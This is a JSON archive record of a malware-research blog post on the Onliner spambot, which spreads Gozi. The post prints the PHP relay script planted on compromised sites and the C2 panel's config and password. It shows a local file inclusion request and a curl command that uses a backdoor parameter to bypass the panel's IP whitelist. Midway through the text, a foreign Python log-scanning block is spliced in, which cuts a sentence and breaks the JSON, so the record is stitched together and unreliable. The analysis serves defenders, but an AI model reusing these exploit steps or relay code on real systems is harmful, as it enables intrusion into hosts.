{
	"id": "490da4ed-bd33-4796-b6bc-76e0688107ca",
	"created_at": "2026-04-06T00:12:56.183145Z",
	"updated_at": "2026-04-10T13:12:45.330617Z",
	"deleted_at": null,
	"sha1_hash": "b492b6d6a11c4c698fee9795278f75ee85b508cf",
	"title": "Spambot safari #2 - Online Mail System",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1149656,
	"plain_text": "Spambot safari #2 - Online Mail System\r\nArchived: 2026-04-05 16:42:41 UTC\r\nHey!\r\nToday I'll present some research around a spambot named \"Onliner\". This spambot is currently used for spreading Gozi.\r\nI've already talked about Onliner in another blog post, but because the spambot evolves quickly and the botmaster seems to be trying to avoid pwning attempts, I'll try to explain everything here :].\r\nOriginal sample\r\nThe first sample that I grabbed came from an email, dropped by JSDropper.\r\nA quick dynamic analysis lets us understand that it's a spambot (a lot of SMTP connections from the malicious process).\r\nBefore reversing it, let's look at the CNC communication.\r\nThe malware communicates over HTTP. An interesting thing is that the process doesn't contact the CNC directly: it tries to contact some proxy web pages (PHP scripts uploaded on compromised websites).\r\nProxy - Good idea - Bad realization\r\nUsing proxy websites is a good idea only if you don't host them on poorly secured, already-pwned CMS installs. With such a CMS it takes anybody around 3 minutes to retrieve your real CNC. Example:\r\nI can make some suppositions:\r\nIt's pretty sure that the botmaster uses a script for updating all the proxy scripts\r\nAll the compromised websites are old: the most probable infection vectors are FTP brute force or CMS exploits\r\nThey have left a PHP backdoor somewhere on the compromised website\r\nI tried to find the PHP backdoor in order to use it to read the PHP proxy code. After some guessing I saw that the PHP backdoor is a WSO webshell, always uploaded in the same locations:\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 1 of 15\r\n/cgi-bin/terms.php\r\n/cgi-bin/useterms.php\r\n/css/terms.php\r\n/css/useterms.php\r\nThe WSO webshell is protected by a weak password -\u003e I can read the PHP proxy code :). The commented version below:\r\n\u003c?php\r\n// base64 of the real CNC URL: http://194.247.13.8/img/\r\n$server = 'aHR0cDovLzE5NC4yNDcuMTMuOC9pbWcv';\r\n// 'OTk=' is base64 for 99: the script exits unless a non-empty '99' parameter arrives in POST or GET. It's a \"security feature\"\r\nif (($_POST[base64_decode('OTk=')]=='')and($_GET[base64_decode('OTk=')]=='')) { exit; }\r\n// forward the query string to the CNC, and the POST body plus the bot's real IP, as a POST request\r\necho file_get_contents(base64_decode($server).'?'.http_build_query($_GET), false, stream_context_create(array('http' =\u003e array('method' =\u003e 'POST','header' =\u003e 'Content-type: application/x-www-form-urlencoded','content' =\u003e http_build_query($_POST).'\u0026ip='.$_SERVER['REMOTE_ADDR']))));\r\n?\u003e\r\nThe real CNC is http://194.247.13.8/img/. I'll come back later to the $_GET['99'] / $_POST['99'] parameters; those parameters are really interesting in the pwning process :D.\r\nPanel - Good idea - Bad realization\r\nFunny, the authentication is not like in other panels.\r\nI don't want to use brute force directly here because, like almost all panels, it must have a vulnerability somewhere.\r\nCome back to the malware communication. As you can see here, the malware downloads some DLLs (ssl and 7zip) from the CNC.\r\nGET /o17504cxn.php?\u00261001=4\u002699=15\u0026f1=ssleay32.dll HTTP/1.0\r\nUser-Agent: Download Master\r\nAccept: */*\r\nReferer: http://ballettschule-nottuln.de/\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nHost: ballettschule-nottuln.de\r\nI'm not a good pentester, but when you see a full DLL name, ssleay32.dll, in a GET parameter, it smells like something bad \\o/.\r\nThanks to that LFI we have access to the whole panel (click on the image below for the full album).\r\nAfter looking around, I found a reference to another IP: 194.247.13.178.
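The relay script and the captured bot request above give whoever finds one of these PHP files on a compromised site something concrete to hunt for. The following Python is an added example, not part of the original post and not Onliner code: it recovers the real CNC from a harvested relay config line, mirrors the relay's 99 gate, and scans Apache combined-format access-log lines for the traits of bot-to-relay traffic seen in the post (the 99 parameter, an f1= DLL fetch, the Download Master user agent, a POST check-in through the relay). The log lines are constructed for the example, with RFC 5737 documentation addresses as clients; the indicator names and the two-indicator threshold are my own choices, not anything the post states.

```python
import base64
from urllib.parse import parse_qs, urlsplit

DQ = chr(34)  # double-quote character, built with chr() so the sample text contains none
SQ = chr(39)  # single-quote character

# Constructed: the config line of the relay script, as quoted in the post.
RELAY_CONFIG = '$server = ' + SQ + 'aHR0cDovLzE5NC4yNDcuMTMuOC9pbWcv' + SQ + ';'


def recover_cnc(php_source):
    '''Return the decoded $server value of a harvested relay script, or None.
    The value is taken between the first pair of single quotes, so a trailing
    comment on the same line does not matter.'''
    for line in php_source.splitlines():
        fields = line.split(SQ)
        if line.strip().startswith('$server') and len(fields) >= 3:
            return base64.b64decode(fields[1]).decode('ascii')
    return None


def relay_accepts(get_params, post_params):
    '''Mirror of the gate in the relay: it exits unless a non-empty 99 parameter
    arrives in GET or POST (a missing key compares equal to the empty string in PHP).'''
    return bool(get_params.get('99') or post_params.get('99'))


def parse_combined(line):
    '''Split an Apache combined-format line on its double quotes. The pieces are:
    client/ident/user/time, request, status and size, referer, a space, user agent.'''
    parts = line.split(DQ)
    if len(parts) < 7:
        return None
    request = parts[1].split(' ')
    if len(request) != 3:
        return None
    return {'client': parts[0].split(' ')[0], 'method': request[0],
            'path': request[1], 'referer': parts[3], 'ua': parts[5]}


def onliner_indicators(entry):
    '''Name the traits of the bot-to-relay traffic from the post that one entry shows.'''
    url = urlsplit(entry['path'])
    query = parse_qs(url.query, keep_blank_values=True)
    hits = []
    if query.get('99', [''])[0]:
        hits.append('99-gate-param')       # the value both the relay and the C2 insist on
    if any(v.lower().endswith('.dll') for v in query.get('f1', [])):
        hits.append('f1-dll-fetch')        # module download by file name, the LFI sink
    if entry['ua'] == 'Download Master':
        hits.append('ua-download-master')
    if entry['method'] == 'POST' and url.path.endswith('.php') and '99' in query:
        hits.append('post-through-relay')  # check-in traffic relayed to the C2
    return hits


def scan_log(lines):
    '''Return (client, path, indicators) for every entry with at least two indicators.
    The threshold is an assumption of this example; tune it to the site.'''
    flagged = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        hits = onliner_indicators(entry)
        if len(hits) >= 2:
            flagged.append((entry['client'], entry['path'], hits))
    return flagged


# Constructed sample log of a site hosting the relay. Clients are RFC 5737 documentation
# addresses; the first request copies the one captured in the post, the second is a check-in.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Feb/2017:10:01:02 +0000] ' + DQ
    + 'GET /o17504cxn.php?&1001=4&99=15&f1=ssleay32.dll HTTP/1.0' + DQ
    + ' 200 1024 ' + DQ + 'http://ballettschule-nottuln.de/' + DQ + ' ' + DQ + 'Download Master' + DQ,
    '198.51.100.7 - - [12/Feb/2017:10:01:05 +0000] ' + DQ + 'POST /o17504cxn.php?99=7 HTTP/1.0' + DQ
    + ' 200 51 ' + DQ + '-' + DQ + ' ' + DQ + 'Mozilla/5.0' + DQ,
    '198.51.100.9 - - [12/Feb/2017:10:02:00 +0000] ' + DQ + 'GET /index.php?page=about HTTP/1.1' + DQ
    + ' 200 4096 ' + DQ + '-' + DQ + ' ' + DQ + 'Mozilla/5.0' + DQ,
]

if __name__ == '__main__':
    print('real CNC behind the relay:', recover_cnc(RELAY_CONFIG))
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, path, ', '.join(hits))
```

Run against a real access log, the 99-gate-param indicator alone is the cheapest pivot: legitimate visitors never send a query parameter literally named 99, so every client that does is either an infected bot or the botmaster's updater script, and the f1= values list the modules the bots have fetched through the relay.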
This server hosts another Onliner web panel: hxxp://194.247.13.178/naomi/login.php (click on the image below for the full album).\r\nLooking at the IP addresses (194.247.13.8 and 194.247.13.178), it seems that those guys really like the \"DELTA-X\" hoster (Ukraine).\r\nYou know, for science, I tried to scan 194.247.13.0-255 with Nmap on port 80, plus some directory guessing with Patator.\r\nAnd you know what? It works haha!\r\nI found another panel at hxxp://194.247.13.196/asus/login.php.\r\nPanel V2 - Good idea - Bad realization\r\nAfter I released the first blog post about Onliner, the botmaster changed some stuff. They started to use IP whitelisting for accessing the panel, they updated some code, they didn't patch the LFI, and they added some other vulns x].\r\nNow, due to the IP whitelisting, when you try to access the web panel you are kicked by the PHP script:\r\nThe LFI is still here, so we can look at the code. We can see 4 whitelisted IPs (please don't spoil yourself, ignore the first 2 foreach loops haha, I'll discuss that below):\r\n\u003c?php\r\nerror_reporting(0);\r\n// naive anti-SQLi filter over every POST value except edit_file, then over every GET value.\r\n// strpos() == true only holds for a non-zero offset, so a quote at position 0 gets through\r\nforeach($_POST as $keyD=\u003e$valD){\r\nif ($keyD!='edit_file') {\r\nif (strpos($valD,\"'\") == true) { exit; }\r\nif (strpos($valD,'\"') == true) { exit; }\r\nif (strpos($valD,\"--\") == true) { exit; }\r\nif (stripos($valD,\"UNION\") == true) { exit; }\r\nif (stripos($valD,\"SELECT\") == true) { exit; }\r\n}\r\n}\r\nforeach($_GET as $keyD=\u003e$valD){\r\nif (strpos($valD,\"'\") == true) { exit; }\r\nif (strpos($valD,'\"') == true) { exit; }\r\nif (strpos($valD,\"--\") == true) { exit; }\r\nif (stripos($valD,\"UNION\") == true) { exit; }\r\nif (stripos($valD,\"SELECT\") == true) { exit; }\r\n}\r\n/* Green IP */\r\n$IP[0]=\"95.211.168.97\";\r\n$IP[1]=\"163.172.235.143\";\r\n$IP[2]=\"66.180.197.197\";\r\n$IP[3]=\"91.215.152.113\";\r\n$IP[4]=\"1\";\r\n/* Database Hostname */\r\n$dbhost=\"localhost\";\r\n/* Database User */\r\n$dbuname=\"root\";\r\n/* Database Name */\r\n$dbname=\"naomi\";\r\n/* Password Database */\r\n$dbpass='XXXXXXXXXXX';\r\n/* Password */\r\n$password=\"70183619\";\r\n/* Folder */\r\n$dir=\"naomi\";\r\n/* Spamhaus Check */\r\n$SpamhausCheck=\"0\";\r\n/* Sorbs Check */\r\n$SorbsCheck=\"0\";\r\n/* Barracuda Check */\r\n$BarracudaCheck=\"0\";\r\n$LOG='0';\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\ninclude('functions.php');\r\n?\u003e\r\nIt looks bad. I can read the PHP code, but I can't access the admin panel. It's time to understand the authentication process. Take a seat, it's wonderful. This is a big picture of the process:\r\nadmin.php:\r\n\u003c?php\r\ninclude(\"config.php\");\r\ninclude('aut.php');\r\nif ($auth==true) { include('panel.php'); } else {\r\nif ($_GET['pass']=='Lm7%Dv)ko4q') {\r\ninclude('login.php');\r\n}\r\n}\r\n?\u003e\r\nI cannot explain yet what the hell this is:\r\nif ($_GET['pass']=='Lm7%Dv)ko4q') {\r\ninclude('login.php');\r\n}\r\nAnyway, the big picture shows us that the situation looks bad: the IP whitelisting is done early. But the function for IP whitelisting is in fact... a backdoor \\o/:\r\n\u003c?php\r\n$L=1;\r\n// the whole whitelist check is skipped as soon as a non-empty '99' parameter arrives in GET or POST\r\nif (($_GET['99']=='')and($_POST['99']=='')) {\r\nif (($IP[0]!='')or($IP[1]!='')or($IP[2]!='')or($IP[3]!='')or($IP[4]!='')) {\r\nif (($IP[0]==$ip)or($IP[1]==$ip)or($IP[2]==$ip)or($IP[3]==$ip)or($IP[4]==$ip)) {\r\n$L=1;\r\n} else {\r\n$L=0;\r\n}\r\n}\r\nif ($L==0) { die('Not Found\r\n\r\nThe requested URL was not found on this server.'); }\r\n$L=0;\r\n}\r\n?\u003e\r\nRemember the $_GET['99'] in the PHP proxy script? Look at the script. To bypass the IP whitelisting when an infected bot tries to contact the CNC, they use these parameters, $_GET['99'] and $_POST['99'].\r\nI just need the code (in config.php) + to set the POST and GET variables, and I can access the CNC from any IP.\r\ncurl --data \"code=70183619\u002699=backdoor\" \"http://194.247.13.178/naomi/admin.php?99=backdoor\u0026mailer=true\" \u003e onliner.html\r\nBonus\r\nTo finish, I just want to show you, without comment, 2 security features used in the Onliner panel.\r\nAnti-SQLi:\r\nforeach($_POST as $keyD=\u003e$valD){\r\nif ($keyD!='edit_file') {\r\nif (strpos($valD,\"'\") == true) { exit; }\r\nif (strpos($valD,'\"') == true) { exit; }\r\nif (strpos($valD,\"--\") == true) { exit; }\r\nif (stripos($valD,\"UNION\") == true) { exit; }\r\nif (stripos($valD,\"SELECT\") == true) { exit; }\r\n}\r\n}\r\nforeach($_GET as $keyD=\u003e$valD){\r\nif (strpos($valD,\"'\") == true) { exit; }\r\nif (strpos($valD,'\"') == true) { exit; }\r\nif (strpos($valD,\"--\") == true) { exit; }\r\nif (stripos($valD,\"UNION\") == true) { exit; }\r\nif (stripos($valD,\"SELECT\") == true) { exit; }\r\n}\r\nAnti-... I don't know what:\r\n\u003c?php\r\nif (StrPos($_GET['edit'],'htaccess')\u003e0) {\r\necho('**Report sent to the administrator\r\nIf there was an attempt to fill the shell, your account will be disabled.**');\r\nexit;\r\n}\r\n?\u003e\r\nMalware binary\r\nThe malware itself is in fact a dropper. When you run it, it copies itself into C:\\windows\\ and re-runs as a service.\r\nThe dropper tries to drop 2 DLLs:\r\nhttp://cnc.com/MailerSMTP/dll.dll : the spam module\r\nhttp://cnc.com/CheckerSMTP/dll.dll : the SMTP credentials checker module\r\nThose 2 DLLs are XORed with the key\r\n[0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42, 0x32, 0x37, 0x39, 0x36, 0x31, 0x43, 0x43, 0x44, 0x41, 0x37, 0x30, 0x43, 0x32, 0x30, 0x39, 0x37, 0x38, 0x32, 0x46, 0x44, 0x44, 0x35, 0x31, 0x34, 0x43, 0x34, 0x36, 0x37, 0x44, 0x37, 0x39, 0x44, 0x30, 0x39, 0x39, 0x33, 0x38, 0x30, 0x33, 0x35, 0x31, 0x39, 0x43, 0x33, 0x32, 0x41, 0x46, 0x37, 0x33, 0x30, 0x34, 0x30, 0x00]\r\n(these bytes are the ASCII string 72DE4E536F5B27961CCDA70C209782FDD514C467D79D0993803519C32AF73040, 64 hex characters, followed by a NUL terminator).\r\nA little schema of the malware communication initialization (the communication is base64-encoded in $_GET parameters):\r\nAll the modules needed are copied into c:\\windows\\ too.\r\nAfter installation, the malware waits for commands from the CNC. Here is an example with the CheckerSMTP module:\r\nThe CNC sends the \"control account\"; this account (mail + password + SMTP server) is used to be sure that the spamming process works. Valid SMTP credentials can be sent to this control account to\r\nThe CNC sends a list of SMTP servers + a list of compromised accounts in 2 zip files: mask.zip and 3746000.zip\r\nThe CNC waits until the bot finishes its job and sends another list of SMTP servers + credentials\r\nThe sample is pretty well detected by the AV industry (maybe due to the lot of debug strings present in the binary).\r\nConclusion\r\nAs a reminder, this spambot is used to spread Gozi in Italy and Canada.\r\nOnliner has around 1000 infected bots; they don't spread too many samples of the spambot.\r\nI look forward to the next update of the panel.\r\nAnnexe\r\nOnliner known IPs:\r\n194.247.13.8\r\n194.247.13.178\r\n194.247.13.196\r\n91.210.165.163\r\nSpambot samples:\r\n9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1\r\nB5C87CAB2FF99D1E4B4C3EE897B07869FA8F6A63FBD27018F589C105FAF91FCD\r\nModule samples:\r\n3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565\r\nb535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618\r\nSource: https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
	],
	"report_names": [
		"spambot-safari-2-online-mail-system.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434376,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.pdf",
		"text": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.txt",
		"img": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.jpg"
	}
}